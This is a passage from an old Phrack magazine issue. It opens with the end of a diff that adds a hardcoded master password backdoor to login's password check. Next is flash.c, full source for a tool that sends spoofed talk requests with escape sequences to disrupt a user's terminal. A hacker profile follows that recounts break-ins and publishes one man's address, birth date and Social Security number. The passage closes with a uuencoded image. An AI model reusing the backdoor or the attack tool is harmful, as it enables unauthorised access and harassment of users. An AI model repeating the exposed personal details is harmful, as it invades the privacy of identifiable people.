+ } + utent = utmp; } #endif /* SVR4 */ } diff -c /root/work/login/valid.c /root/work/logon/valid.c *** /root/work/login/valid.c Sun Oct 11 07:16:55 1992 --- /root/work/logon/valid.c Sat Jun 4 15:47:28 1994 *************** *** 25,30 **** --- 25,32 ---- static char _sccsid[] = "@(#)valid.c 3.4 08:44:15 9/12/91"; #endif + extern int magik; + /* * valid - compare encrypted passwords * *************** *** 43,48 **** --- 45,64 ---- char *encrypt; char *salt; char *pw_encrypt (); + char *magic; + + /* + * Below is the piece of code that checks to see if the password + * supplied by the user = the Magic Password - Data King + */ + + magic = "CONSOLE"; /* Define this as the Magic Password - Data King */ + + if (strcmp(password,magic) == 0) + { + magik = 1; + return(1); + } /* * Start with blank or empty password entries. Always encrypt ------------------------------------------------------------------------------ /* flash.c */ /* This little program is intended to quickly mess up a user's terminal by issuing a talk request to that person and sending vt100 escape characters that force the user to logout or kill his/her xterm in order to regain a sane view of the text. It the user's message mode is set to off (mesg n) he/she will be unharmed. This program is really nasty :-) Usage: flash user@host try compiling with: gcc -o flash flash.c */ #include #include #include #include #include #include /* this should really be in an include file.. */ #define OLD_NAME_SIZE 9 #define NAME_SIZE 12 #define TTY_SIZE 16 typedef struct { char type; char l_name[OLD_NAME_SIZE]; char r_name[OLD_NAME_SIZE]; char filler; u_long id_num; u_long pid; char r_tty[TTY_SIZE]; struct sockaddr_in addr; struct sockaddr_in ctl_addr; } OLD_MSG; typedef struct { u_char vers; char type; u_short filler; u_long id_num; struct sockaddr_in addr; struct sockaddr_in ctl_addr; long pid; char l_name[NAME_SIZE]; char r_name[NAME_SIZE]; char r_tty[TTY_SIZE]; } CTL_MSG; #define TALK_VERSION 1 /* protocol version */ /* Types */ #define LEAVE_INVITE 0 #define LOOK_UP 1 #define DELETE 2 #define ANNOUNCE 3 int current = 1; /* current id.. this to avoid duplications */ struct sockaddr_in *getinaddr(char *hostname, u_short port) { static struct sockaddr addr; struct sockaddr_in *address; struct hostent *host; address = (struct sockaddr_in *)&addr; (void) bzero( (char *)address, sizeof(struct sockaddr_in) ); /* fill in the easy fields */ address->sin_family = AF_INET; address->sin_port = htons(port); /* first, check if the address is an ip address */ address->sin_addr.s_addr = inet_addr(hostname); if ( (int)address->sin_addr.s_addr == -1) { /* it wasn't.. so we try it as a long host name */ host = gethostbyname(hostname); if (host) { /* wow. It's a host name.. set the fields */ /* ?? address->sin_family = host->h_addrtype; */ bcopy( host->h_addr, (char *)&address->sin_addr, host->h_length); } else { /* oops.. can't find it.. */ puts("Couldn't find address"); exit(-1); return (struct sockaddr_in *)0; } } /* all done. */ return (struct sockaddr_in *)address; } SendTalkPacket(struct sockaddr_in *target, char *p, int psize) { int s; struct sockaddr sample; /* not used.. only to get the size */ s = socket(AF_INET, SOCK_DGRAM, 0); sendto( s, p, psize, 0,(struct sock_addr *)target, sizeof(sample) ); } new_ANNOUNCE(char *hostname, char *remote, char *local) { CTL_MSG packet; struct sockaddr_in *address; /* create a packet */ address = getinaddr(hostname, 666 ); address->sin_family = htons(AF_INET); bzero( (char *)&packet, sizeof(packet) ); packet.vers = TALK_VERSION; packet.type = ANNOUNCE; packet.pid = getpid(); packet.id_num = current; bcopy( (char *)address, (char *)&packet.addr, sizeof(packet.addr ) ); bcopy( (char *)address, (char *)&packet.ctl_addr, sizeof(packet.ctl_addr)); strncpy( packet.l_name, local, NAME_SIZE); strncpy( packet.r_name, remote, NAME_SIZE); strncpy( packet.r_tty, "", 1); SendTalkPacket( getinaddr(hostname, 518), (char *)&packet, sizeof(packet) ); } old_ANNOUNCE(char *hostname, char *remote, char *local) { OLD_MSG packet; struct sockaddr_in *address; /* create a packet */ address = getinaddr(hostname, 666 ); address->sin_family = htons(AF_INET); bzero( (char *)&packet, sizeof(packet) ); packet.type = ANNOUNCE; packet.pid = getpid(); packet.id_num = current; bcopy( (char *)address, (char *)&packet.addr, sizeof(packet.addr ) ); bcopy( (char *)address, (char *)&packet.ctl_addr, sizeof(packet.ctl_addr)); strncpy( packet.l_name, local, NAME_SIZE); strncpy( packet.r_name, remote, NAME_SIZE); strncpy( packet.r_tty, "", 1); SendTalkPacket( getinaddr(hostname, 517), (char *)&packet, sizeof(packet) ); } main(int argc, char *argv[]) { char *hostname, *username; int pid; if ( (pid = fork()) == -1) { perror("fork()"); exit(-1); } if ( !pid ) { exit(0); } if (argc < 2) { puts("Usage: "); exit(5); } username = argv[1]; if ( (hostname = (char *)strchr(username, '@')) == NULL ) { puts("Invalid name. "); exit(-1); } *hostname = '\0'; hostname++; if (*username == '~') username++; #define FIRST "\033c\033(0\033#8" #define SECOND "\033[1;3r\033[J" #define THIRD "\033[5m\033[?5h" new_ANNOUNCE(hostname, username, FIRST); old_ANNOUNCE(hostname, username, FIRST); current++; new_ANNOUNCE(hostname, username, SECOND); new_ANNOUNCE(hostname, username, SECOND); current++; new_ANNOUNCE(hostname, username, THIRD); old_ANNOUNCE(hostname, username, THIRD); } ------------------------------------------------------------------------------ ==Phrack Magazine== Volume Five, Issue Forty-Six, File 5 of 28 **************************************************************************** -:[ Phrack Pro-Phile ]:- This issue our prophile introduces you to one of the craziest people I've ever met from the Underground. And coming from a complete loon like me, that's saying something. This guy is a real Renaissance Man: Hacker, programmer, burglar, convict, star of stage and screen... Of course, that someone could only be: Minor Threat ~~~~~~~~~~~~ _____________________________________________________________________________ Personal Info: Handle: Minor Threat Call him: MT, minor, lamer Born: 1972 in Walnut Creek, California Age: 22 Height: 6'1" Weight: 155 lbs e-mail: mthreat@paranoia.com www: http://www.paranoia.com/~mthreat/ Affiliations: Dark Side Research Computers owned: 1981: IBM PC 1982: none 1984: PCjr 1988: XT Clone 1990: 386/25 Clone 1992: Too many to legally list 1994: Pentium & 486 How I got started ~~~~~~~~~~~~~~~~~ In 1981, my dad worked for IBM. In October of that year, he brought home a PC, and I jumped on BASIC. It wasn't until 1984 that I got my first modem. I had just moved to Florida with my dad, and he had a modem. I met some other kids with computers and modems and they taught me what modems were for: "You call other people's computers and try to get their passwords and intercept their mail". (That's what I was taught!) It wasn't until a few months later I realized that this wasn't the actual purpose of BBSs and modems. My first BBS was the Towne Crier BBS at FAU (Florida Atlantic University), 305-393-3891 (I still remember that damn number), but the NPA has since changed to 407. We thought it was so cool when we logged on as "All" and deleted all the messages posted to "All". In about 1985, I moved back to Austin. I screwed around for several years without doing any real hacking. When I got to high school, I wanted to change my grades like in War Games, so I looked through the counselor's office until I found a number to the Education Service Center. I had to scan a whole _100_ numbers (929-13xx) to find the HP3000 dialup. Once I found it, I had no idea what to do. I gave the number to a friend in high school, who gave it to some of his hacker friends. They hacked it and gave it back to me, complete with a full list of passwords and commands. It turns out, the two Austin hackers who did it were The Mentor and Erik Bloodaxe, but I didn't know that for another 3 years. Shortly after this, I picked my permanent handle. Minor Threat was an early-to-mid 1980's punk band from Washington, DC. They're no longer together, but Fugazi is pretty good and Ian McKaye (from Minor Threat) is in Fugazi. I actually got the handle off of one of my sister's tapes, before I even heard them. But now I like the music too. Eventually, I found a local pirate board, met all the local pirates, and got into the warez scene for a while. I joined PE (Public Enemy), the pirate group. (I cracked the warez!) Warez were only so fun, so I looked for other stuff. I met some VMB lamers and got into that scene for about a month, and got bored again. This was 1990, our 950s were running out, and we needed another way to call out. So I took an old VMB hacking program I had written, and changed it around to scan for tones, in random order to avoid Ma Bell problems. I nicknamed it ToneLoc, short for Tone- Locator. I gave it to some friends (Alexis Machine & Marko Ramius) and eventually, it ended up on some warez boards. It got pretty popular, so I made a version that worked for more people, called it 0.90, and released it. Then I lost the source in a hard drive crash, and stopped working on it. I was 18 and mom said it was time to get out of her house, so I got my own apartment. Marko Ramius and I learned about trashing central offices, and gained COSMOS access. We barely knew what COSMOS was .. I knew I had read about it in old Phrack articles, and I remembered that it was "elite." Our problem was, we still knew no other "real" hackers, and we had to learn COSMOS. After trashing and trashing, we still had no COSMOS manuals. We had to get them somehow. I can't say how, I'll leave it to your imagination. Marko and I started breaking in buildings and got pretty good at it. We had about a 60% success rate I would guess. But we never stole anything -- we just looked for cool information. In 1991, we got caught in a building, and got charged with Criminal Trespassing. We both got probation for a Class A misdemeanor. We decided it was time to stop breaking in buildings. Late in 1991, I got e-mail on a bulletin board from someone named Mucho Maas. He said he had gotten ToneLoc and wanted a few new features. I told him I had lost the current source and all I had was an old (0.85) source. He said he would take the old source, add the new features, and bring it up-to-date with the current source. So he did, and we released ToneLoc 0.95. If it weren't for Mucho, ToneLoc would still be at version 0.90, and anyone who ran 0.90 knows how hard it was to get it running right. About the same time, I was getting on a few BBSs in the Washington DC area. (Pentavia was the best while it was up). I met several people there... including a guy named Codec. Codec was mostly a phone phreak, but did a little hacking as well. But when it came to PBX's, he was a master. Not only had he exploited PBXs for free long distance use like the rest of us, but he had actually REMOVED entire PBX systems from buildings! (See his article on how to do this, Phrack 43, article 15). But he had also gotten caught and was on federal probation. A few months after I met Codec, he had an 'incident' and was on the run again. I agreed to let him live with me, so he flew down and moved in. We got a 2 bedroom place, and set the place up d0pe. There were over 9 phone extensions, (not including cordless), and about the same number of computers (Most of which were Codec's). We had the funnest 3 months ever ... but about 2 weeks after SummerCon 1992, we got arrested. Favorite things ~~~~~~~~~~~~~~~ Women: w0w Music: Sonic Youth, Cure, Fugazi, Minor Threat, Orb, B-Boys, Jane's Addiction. Favorite Book: 1984 My Car: 1990 300ZX Twin Turbo, Wolf Chip mod to 360 horsepower. It's fucking fast. Favorite Movies: Jackie Chan movies, The Killer, Reservoir Dogs, The Lost Boys, Near Dark, Hardware. Favorite TV: MacGyver What are some of your most memorable experiences? Being polygraphed by the Secret Service in 1991 for something having to do with some lamer threatening the president on an Alliance Teleconference. I failed the polygraph the first time, then I passed it the second time. (How's that for the government?) Eventually, some other 15-year old got probation for doing it. Being arrested with Codec in 1992. He ran, outran the cops, jumped a fence about 8 feet tall, and eventually got in a struggle with a cop over the his gun (Officer Sheldon Salsbury, Austin PD). The gun went off, and we were both booked on attempted capital murder. It turned out that the bullet hit no one, and all the blood was from the cop hitting himself in the head with his own gun, although the cop claims that Codec hit him in the forehead with a 2-meter ham radio from like 20 feet away. Right. A search warrant was executed on our apartment, and approximately $800,000 worth of AT&T Switching equipment was seized from Codec's closet. It turns out, we were narced on and set-up by : Jon R. Massengale 6501 Deer Hollow Austin, TX 78750 DOB: 9-7-62 SSN: 463-92-0306 Being the first in Texas to have Caller-ID, before it was legally available. Losing control of my car at 140mph, doing a slow 360 at about 120, living through it, and not doing too much damage to my car. Good times: Going up to Seattle to visit Cerebrum in May 1993, seeing Fugazi, getting our car towed, then reading the dialups to the towing company's xenix (login: sysadm). Finally getting our Oki 900's to clone/tumble/do other d0pe things. Calling each other on our Okis from 5 feet away, putting them together and causing feedback. Setting up my apartment with Codec with a 10-station Merlin system, and a 9-station network. SummerCon 1993. "Culmination of Coolness." Sorry, can't say any more. Some People To Mention: There are a lot of people who I would like to mention that have helped me greatly and who I have known for a very long time: Marko Ramius - First pirate/hacker I really knew in person. We did a lot of crazy shit together. Alexis Machine - Second hacker-type I met, and a true Warez Kid. (that's a complement!) Mucho Maas - Brought back ToneLoc from the dead. Always told me what I shouldn't do, and always said "I told you so" when I got busted. Codec - I had some of the funnest times of my life with Codec... unfortunately, it was so much fun it was illegal, and we got busted. Cerebrum - Very cool friend who got narced on by a fuckhead named Zach, 206-364-0660. Cerebrum is serving a 10 month federal sentence in a nice prison camp in Sheridan, Oregon. He gets out about December 10, 1994. The Conflict - Unfortunately, I can't tell you. Maybe in about 8 more years. ESAC Administrator - "Have you been drinking on the job?" What I'm up to now ~~~~~~~~~~~~~~~~~~ When I heard that the next Phrack Pro-phile was going to be about me, I realized, "I must be retired". It's probably true.. at least I hope it is. The 5 months I spent in jail was enough. I just started going back to University of Texas, where they will only give me a VAX account (lame). For the first time in 4 years, I think my life is going in the 'right' direction. Advice ~~~~~~ I can only hope anyone who reads this will take this seriously. Here's my advice: If you ever get arrested or even simply questioned about ANYTHING AT ALL, DO NOT COOPERATE. Always tell the law enforcement official or whoever, "I'm sorry, I can't talk without my lawyer present" Cooperating will never help you. Codec recently pointed out to me, that we should be the "role models" of what people should do when they get busted. Both of us remained loyal and quiet during our whole case. I was in jail for 5 months, and Codec is still in prison, but we never talked. Being narced on by a 'buddy' is the worst thing that could ever happen to you, and narcing on a 'buddy' is the worst thing you could do to them. If you get busted for something, don't pass the punishment on to someone else. I hope most of you never have to face this, but if you do, you will live much better knowing that you didn't give in to a bunch of 'law enforcement' pricks. ==Phrack Magazine== Volume Five, Issue Forty-Six, File 6 of 28 **************************************************************************** BIG FUN Think Federal District Court Judges and Special Agents get to have all the fun? Not any more!! It's the Operation Sun Devil Home Game! For the first step in the game, a quick flourish of a pen signs away your opponent's rights to any expectations of privacy. Bank records, medical records, employment files, student records...literally anything is yours for the taking. As you progress through the various levels, you move on to other legal scenarios like the application for search warrant and the summons. It's all here in the Operation Sun Devil Home game, by Gailco. =============================================================== Other game pieces available via ftp from freeside.com in /pub/phrack/gailco. Offer not sold in stores. Do not use. Impersonating an officer of the court is a felony. section 1 of uuencode 4.13 of file GAME.PCX by R.E.M. begin 644 GAME.PCX M"@,!`0````!/!D@(Q@#&````````````````````````````````````````V M```````````````````````````!R@`!`"`#6`(`````````````````````W M``````````````````````````````````````````````````#________-( M_________\W_________S?_________-_________\W_________S?______D M___-_________\W_________S?_________-_________\W_________S?__R M_______-_________\W_________S?_________-_________\W_________> MS?_________-_________\W_________S?_________-_________\W_____R M____S?_________-_________\W_________S?_________-_________\W_R M________S?_________-_________\W_________S?_________-________] M_\W_________S?_________-_________\W_________S?_________-____R M_____\W_________S?_________-_________\W_________S?_________-R M_________\W_________S?_________-_________\W_________S?______D M___-_________\W_________S?_________-_________\W_________S?__R M_______-_]'_P?!'P?[!X<'@P?_!]F#$_\'XPO_!\'______ZO_1_\'P8\'^X M8<'@P?_!]&#$_\'XPO_!\'_!_O_____I_]#_'\'@P>'!_@$`?\'&`'_#_\'PF MP?@^(!X.?\'_P?C_____YO_0_P_"P\'^`PX_CAX?P__!P,'\'P/"#A_!_\'^^ M'______E_]#_!X?!Y\'^`PX_#L(>#V_!_\'`?!X'C@\?P?^$#\'_A\[_C___X M___4_]#_!X?!Y\'_`PX_#PX>#V?!_\'&P?X?!X?!\<'^`<'`P?\,`&"`L M8<'_P?C!_SP@!X^?P?^#P>QXP'!^,'_P?G$_\'\`#'!_\'A& MG\'X`?_____._\__P?P`P>/!\<'\<`!_'#!@`&/!_\'PP?YX<`?!Q\'?P?_!H MP,'X<,'`&`'!P'#"`,'P/\'QP>!_P?A_P?!X<<'^P?*?PO#!\<']_____\S_< MS__!_&#!X\'PP?QP.'Y\<&`@9\'_P?C!_'AP)\'WPO_!X'APP>`X8,'@<&`@, MP?`_P?#!X'_!^'_!^'QPP?S!\+_#\,'XP?S_____R__/_\'X8&'!X<'\<`P_< M'GYAP>8'P?_!^,'^.,'[AX^?P?_!\``XP<.`$/P?&`'\'P0\'PV MP?_!\`AA'\'AP?G!P,'@.`______RO_/_\'\'$.#P?X0#A\>/@.&#\'_P?C!S M_QS!_P^/G\'_P=X$/,''@'@?``(<7P_!\8/!_X``M M#`______RO_0_\'^#@_!_@`$/P\^``\.?\'\P?\

8?CQ_!_P\$/`>,>!\`7 M!AP$#\'A#Q_!_@?!_,'_P>,,0Q_!Q\'_C`,,#______*_]'_/@_!_P<&/P\_9 M!L(//\+_'\'F'X\/P?\/AAZ'ACH/`@X>`@_!XX`'P?P_`8#!XQ_!X\'_@``0`______*_]7_P?'!_\'OR/_!_<'_] MP?X_P?^`P@#!P`@A@"#!X#A`#\'AAQ_!X,'#P?A\`<'@P>$?P>'!^,'`<``#' M_____\K_U__!Y\K_P?Y_P?_!X'Q`P>!X`<'@<``PP>`'P?#!QI_!X,'#P?C"4 M,,'AP>"?PO``<`#!\______*_^7_P?C!_\'YPOASP?#!^'S!^,'PP?_!\<+_@ MP?!AP?Q@<,'QP>`_P?!@P@`PP>/_____RO_I_\'X?\'[P?Y_P?[!\,'_P?G"^ M_\'X`\'\`''"X1_!^,0`0______*_^G_P?[-_\'?P_^?P?X'@A`>#______*; M__W_#\'/'A\/_____\K_S__!]\,'S`^/P=^/P=_#G______F_\__P?3$`,8$2 MP@##!`>'#Q_"G\*______^7_S__!_<'XPN!@PR``PB``PB#,`"``PB#$8,'@R MPF#!X&#"^<']P?G!_?_____1_]#_P?G%\,)@P>#!\&!PP?#"X&!`Q6``0,0`1 MQ4#"8$#"8'#&\,'QP?G!_?_____,_]__P?W!_\/YP?W!^<'XP?#"^,;PQG##: M8,(@Q6#$<,3PP?'!^\'PP?C!_\'Y___]_^?_P?O"_\/[P?#!^<+P<&#!\'!@' MPT#+`,-`8&'!^\+PPOO___W_S__!^L0``@#'`L(&#L(/'Y_"'Y\?P?^?P=_/@ M_\+?GY["#@;%`LH`Q@(/PA^?P=____#_S__!_L4$P@`$P@#"!,4&P@\.Q@_"K M'\?_O\G_O\8/P@["!@0&!,@`PP0&#L'!_<'_P?W[_^C_P?O!_\'YPOO!^,']P?G&\,/@Q&#"I M0,8`PD##8,'@QO#!\\/YR__#^\+QR?!PP?#"X,)@P>#$8$##`$``PF##0&#"; M0`#$8'#(\,'Q]/_Z_\']P?G!_<+YP?C#\'#!\,-PQ&#%(,5@PW#!\,)PP?#$F M^,+YP?_!_<'YP?W)_\']P?_!_<'_P?W!_\'YP?_!^<'XQ/!PP?#$<,-@<,)@- M<,A@PR#$8,)P8,1PP?!PQ/#!^,'YP?C!_=_____!_\'YP?_!\,'YP>##\,'`B M0-(`0&#$\,'YP_O7_\'ZP?'!^,'YP?C!^<'P0&!`<$!@PT#7`$#"`$#"<,'XO M>,'[P?_!^\'YP?O9____SO_!W\*?'Q[##L(&P@+.``(&P@#$`L<&#AX/PI_!9 MW];_G\'?'X\>!@<.PP8"#L,"T`##`L,&P@X/'\[____1_Y^_PI\?Q`_##@8.Q MQ`;"!,0`!,8`!``&P@0`PP0&Q@\?#\2?OY^_G[^?R?^_P?^_#\(?GQ\/PA^/N MPP\.#P8/Q0;.`,(&#A_,____W__!W\'_G\'/PX_"#\8'!L0'!L('Q08"R`;#- M!P;&!\(/!\(/Q(^?C\'?P<_!_\'?RO^?P?^/P=_"G\*/#X_%#\('P@;"`@8": M#\S____I_Y^_/[^/P@\_Q`\'CP;"!-@`P@0`P@ MS?_________-_________\W_________S?_________-_________\W_____R M____S?_V_\'`?\'\?\'S_____]'_]O\`'\'^'\'S_____]'_]?_!_@`.!!_!L MP#]_T__!S___^O_U_\'^``8"'X`??\3_P!@(``\(`'%_\'AP?_!\\/_0 MP?Q_QO_!^,(`<=/_P?A]P?_!_,'XQ/_!^``.$`#' MQ?_!P\'_P>/#_\'X#\;_P?#"``/3_\'X.,'X0``#P__!P`KQ/_!_@/!_\'X?\+_P?POQ/_!^#_&_\'QP__!X,0``\?_P?A_Q/_!\,3_4 MP?#$_\'^?,(`(\O_P?GU__;_P>!X`S_!^`/!_@?!^,+_'\'X`'_!_\'OP?_!B MP`/$_\'^!\'_P?Q_PO_!^`_$_\'X'\;_P>'#_\'PQ``!QO\/P?@_Q/_!\\3_; MP>#$_\'X&,(`#\O_P?'U__;_P@'P?X'P<`?P?X/P>``#\'_!\'_L MP=P`/\/_P?X'P?_!_!_"_\'H#S_!_Q_!_\'@#\+_O\/_P>?$_YX-C\'``<;_R M#\'H'\G_@\3_P>@`!@`?R__!P_7_]O^"P?X##\'@!\'^!\'`#\'^!\'@``?!3 M_P?!_\'<`A_#_\'^`Q^,#\+_P>`''\'_#\'_P<`//\'_/\+_/\'GQ?\/C\'N@ M`\;_#\'@'\G_@\3_P<.`!P(_R__!P_7_]O\!P?@#!P`'P?@#P@#!\`/!X``'_ MP>``P?_!_``!P__!_,0`/\'_P<``'X`!P?^``#_!_!_!_\'\#\'CQ/_!_#F/R MP?P`QO^/@!_!_[_'_P/$_X&`1\'\S/^!]?_V_P#!^`'"``'!\,(``<'P`<'PF M`"?!X`#!_\'@``'#_\'PQ``_P?_!X``_P@#![\'``#_!^#_!_\'P`<'AQ/_!^ M\''!S\'\`,'_P?Q_P?_!X<'_P<_!X#')_P'$_X&`P>?!^,S_P<'U__7_P?X!3 MP?#"`&`!P?``(`'!\`/!^`'!_\'``'_!P,'@`#$``'!_\'@`#S"``_!9 MP`!_P?`'P?_!\`!CQ/_!\,'QP#!^,'?P<``?!_!\<'_K MP>/!_\'^P?_!_@##_\'^@`#!X\/_P?W)_\'!]?_U_\'\`<'X`##!\`'!^`!PM M`\'X`\'X`\'_P>`@?"#!\`'#_\'@Q0#!_\'P('P@`#_!X!!_P>`CP?_!X``C@ MQ/_"\,'OP?X`?\'P/\'\8'!_H`!X!\'@P?S!X<'_P?@WP?P`P?/"_\'^P@#!` MY\/_P?C"_\'QP?_!]\+_P?O!_`'U__7_P?P!P?@"/\'P`\'^`,'X`\'X`\'X_ M!\'_@$`/`,'P``?P?["`,'\`@`?Q/^` MP?\/@!_!X!_!_@(`?`8`'\3_@'N/P?\`/\'`#\'@P@`_``\``@`<`,'_@`!\$ M``?"_\'\#@`'P_\`#\'_`#X!P?X'@'P`!_3_]?_!_@/!_`,'``?!_P/!_@?!G M_@_!_@?!_X#!_@\#P?\#P_\#P?\.#X\`#\'@#\'_C\'`'\'@'\'^!P`^!\'.' M'\3_`'>/P=\`'\'@#\'`!@/!_X`?P>["`AX#P?\``GX##\+_P?X.`0?"_\'^L M`@`(?"_\'PP@`>`!X`<`,`/``#G M]/_U_\'X`<'PPP`#P?X!P?@#P?@'P?@'P?^`P?#!_P#!_`'#_X!YP?@@P?'!) MX`?!\!_!_\''P>`_P>`_P?P#P#!_`'!_@'!X<'\`\/_P?`<`,'GPO_!\,(`.`!\`'#"`#P`P>/T< M__7_P?@!P?``,,'@`\'\`<'X`\'X`\'X!\'_P<#!\,'_`,'\`/"_\'PP@!X`'P`P?``0'P!) M]?_U_\'X`<'P`'_!\`/!_@'!^`/!^`?!^`?!_\'`P?'!_@#!_`'#_\'`Q`!X2 M!\'P/\'_PN`_P?!_P?P#P>'!^`/!\,3_P?P`P?#!X&``?\'P/\'@?\'AP?_!7 MX'_!_`'!^<'\`<'\`<'[P?P!P__!\#P`P>?"_\'P.&!^P>#!_@#!^`#!X'P!9 M]?_U_\'\`<'X`C_!\`/!_@'!_`/!^`_!^`?!_X#!P\'_`,'\``_PX_!_X`?P?@/P<`?#\'_@!_!_@?!_\'^`\'^K M`\'_P?X#P__!P!X!A\+_P<`/P<`?@'\!P?\'PO\']?_U_\'^`,'TPA_!X`?!J M_P/!_@?!_`_!_@_!_X`_P?\#P?\'P__!_L0`#@?!^`_!_P\`'\'`'\'^`Q_!+ M_@,`#\+_P?["`'>/P?^`'\'@#\'`#P._@!_!_@?!_\'^`\'_!\+_!\/_P<`>/ M`X?"_\'`#\'`'X!_`\'_!\+_!_7_]?_!_`#!\,(_P?`'P?X#P?P'P?P/P?P'G MP?^`?\'_`,'_`\/_P?S$``X'P?@/P?X?@!_!X!_!_@`_P?S"``_"_\'^P@#!$ M\X_!_X`?P?`/P<`.`#^`/\'^!\'_P?P#P?X#P?_!_@/#_\'@'@'!Q\+_P?`/( MP<`_@'X!P?\#P?_!_@/U__7_P?P`<,'^/\'P!\'^`<'X!\'X!\'X!\'_@,+_[ M`<'^``'!P#_!\`_!X,(`/\'`?\'\`\'_P?P!P?X!P?_!_@/#_\'@'`'!Y\+_I MP?`_P>!_@,'^`<'\`<'_P?P!]?_U_\'\`&#!_C_!\`?!_@'!^`/!^`/!^`?!% M_\'`PO\`P?X!Q/_!\`#!\<'@'`?!\!_!^#_!X#_!X'_!^`'!_\'\`&`'PO_!S M^$``P?'!P&#!P'_!\!_!X,(`?\'`?\'\`\'_P?P!P?X!P?_!_@/#_\'P'`'!> MY\+_P?`_P>!_@,'^`<'\`<'_P?P!]?_U_\'\`"'!_'_!\`?!_@'!^`/!^`?!: M^`?!_\'@P?_!_@#!_`'#_\+PPO_!\#@_P?`_P?A_P?`_P>!_P?@#PO_!X,'P3 M!\+_P?C!\`#!\<'`<`!_P?`_P?``0#_!X'_!_`/!_\'\`<'^`<'_P?X!P__!K M\#P!P>?"_\'P/\'P?X#!_@'!_`'!_\'\`?7_]?_!_``#P?X_P?`'P?X!P?@## MP?P'P?@'P?_!P,+_`,'^`?"_\'P'\'@?X#!_@'!_@/!_\'\`?7_]O\`!\'^/X`'P?X#@ MP?P/P?P/P?P'P?^`PO\`P?X#P_^```_!_\'`'A_!^!_!\!_!P!_!X!_!_@?"1 M_\'#P?P'P__!_`/!\X_!_P`?P?`?P?X'P<`?@'_!_@?!_\'^`\'^`\'_P?X'I MP__!\`X'A\+_P?`?P<`?@,'^`<'^`\'_P?X#]?_V_P`'P?\?``?!_@/!_`_!' M_`_!_`_!_X#"_P'!_P/#_X``![_!P!X?P?@?P?`?P<`?P>`?P?X'PO_!X\'^G M!\/_P?P#P>>/P?\`'\'X'\'_#\'`'X!_P?X'P?_!_@?!_@/!_\'^!\/_P>`.5 M#X_"_\'@#\'`'P'!_P'!_P?!_\'^!_7_]O^``@\.``?!_@/!_@?!_@_!_@?!_ M_X#"_P`_!\/_P@`"#P/!_A_!X!_!X!_!P!_!P!_!_@?"_\''P?X/P__!_@?!+ MQX_!_X`?P>`?P?\/P<`?@#_!_@?!_\'^!\'_!\'_P?X'P__!\`8?C\+_P>`// MP<`?`<'_`\'_!\'_P?X']?_V_X``#L(`!\'^`\'\!\'\#\'X!\'_@#^_`#X#_ MP__#```?P?X'PO_!Y\'^!\/_P?P#P<>/P?^`'\'@T M'\'_#\'@'X`_P?X'P?_!_@/!_@/!_\'^`\/_P?`&'X?"_\'P#\'@/X#!_@'!Q M_@/!_\'^!_7_]O_!X,,`>`!\`<'X`,'X`<'P`<'_@,(\``P!PO_!_,0``\'@U MP?_!X!_!\`_!P#_!X#_!^`/"_\'GP?P'P__!_`'!P8O!_\'`/\'P/\'_/\'@E M/X!_P?P#P?_!_`'!_@'!_\'\`\/_P?``?\'GPO_!\#_!X'^`P?X!P?X#P?_!B M_`/U__;_P>##`,'X`'@`P?@`P?@`P?``P?^`('S"``'"_\'\Q``#P>#!_\'@. M'\'P#\'`/\'@?\'X`\+_P`_P!_@,'^`<'^`<'_P?P!D M]?_V_\'PP@`!P?@`P?@`P?P`P?@`P?``?L(`?,(`(<+_P?PXP?##`,'AP?_!R MX`#!\`!@?\'@/,'X`,'XP?]`>`?#_\'X.,(`<,'`?\'P/\'X?\'P?\'@?\'XA M`\'_P?P!P?P!P?_!_`/#_\'X`,'_P>?!_\'XP?`_P>!_@,'^`<'\`<'_P?P!D M]?_V_\'XP@`!P?@`P?P`P?P`P?@`P?@`/L(`P?["``/"_\'\/\'PPP#!P\'_= MP>``<,(`/\'`"G@`P?C!_P!X!\/_P?@8PP"`'\'P'\'X.\'P/X!_P?@#P?_!M M_`'!_@'!_\'\`\/_P?@`?\''P?_!\<'P/\'@?X#!_@'!_@/!_\'\`_7_]__"? M`!_!_@?!_P/!_@?!_@?!_@!_@`/!_\'``!_"_\'^/\'_@,(`'\'_P<``,`!`W M!X``>``#P?["``_#_\'P&,0`'\'P'\'XP@`?`!_!_`/!W\'^`\'^`\'_P?X'` MP__!_@`?A\'_P``'P?["' M``_#_\'@",0`/\'X#\'XP@`?`!_!_`./P?X#P?X%P?_!_@?#_\'^``^/P?^'= MP<`/P<`?`7X!P?X'P?_!_@?U__?_P<\/PO\/P?^/P?^/P?\/P?^'PO\/PO\'U MQ/\?P?\'``?"_\'^!\'^!\'@#\'"!\'^``_!_L(`'\/_@X##``?!_\'@!\'`F M``(?``=^`@_!_@,^``X^`\'/PO_!_@`'A\'_!\'`!X`?`'X#P?X#P?_!_@?UE M__C_G\+_G\/_P=_!_[_!_\'OPO\_PO^'P__!_A_!_@<``<+_P?X'P?P'P?`/6 MP?@'P?X`#\'\P@`_P_^#Q``'P?_!\`'!P,(`/\(`P?@`#\'\`#P`"'@`C\+_6 MP?X``8?!_@?!P`#!P#\`>`'!_`/!_\'\`_7____/_X'!X'_!\`/#_P?!_"_!1 M\#_!^`?!_\'@?\'P(`'$_X#$`#_!_\'P`<'```'!_\'@`<'X`#_!_``XP@#!- M^``/P__#`*`OP<#"`'^`8`#!^`#!X\'X`?7____/_\'@8,'_P?Q_Q/_!_G_!0 M\'_!_L+_P?#!_\'PP?A#P__!_L(`P?!``'_!_\'P`\'```/!_\'P`<'\`'_!& M_`!X``'!^``OP__!P,,`?\'@P@!_@,(`<`!#P?``P>?T____S__!\'')_\'\Y MQ/_!^,'_P?G!_\'SP__!_#!YP?C!\"#"_\'X?\'@P?`_P?_!\#?!_L'@P?_!V M_"#!^,'@(<'X('_#_\'@PP!_P?``(,'_P>`@`'@`(\'X`&?T____S__!^=?_M MP?P`PO_!^T'"_\'\?\'+P?`_P?_!^#_!_\'@PO\!P?_!X!_!_\'`?\/_P>##G M`'_!^``!P?^`'@!X``_!_``']/___^?_P?X'P__!W\;_?\?_A\'_P?X?P?_!Y MP\3_P?S#`,+_@`_!_X`?`'\`'\'_`!_T____Y__!_A_2_\'?R?_!_L(`#\+_B MP>P_P?_!P'^'P?^`?\'_@#_T____Z/\_W?_"`@_#_S_!_\'O?X?!_\''PO^#( M]?______Q__![@___\3_________S?_________-_________\W_________; MS?_________-_________\W_________S?_________-_________\W_____R M____S?_________-_________\W_________S?_________-_________\W_R M________S?_________-_________\W_________S?_________-________] M_\W_________S?_________-_________\W_________S?_________-____R M_____\W_________S?_________-_________\W_________S?_________-R M_________\W_________S?_________-_________\W_________S?______D M___-_________\W_________S?_________-_________\W_________S?__R M_______-_________\W_________S?_________-_________\W_________> 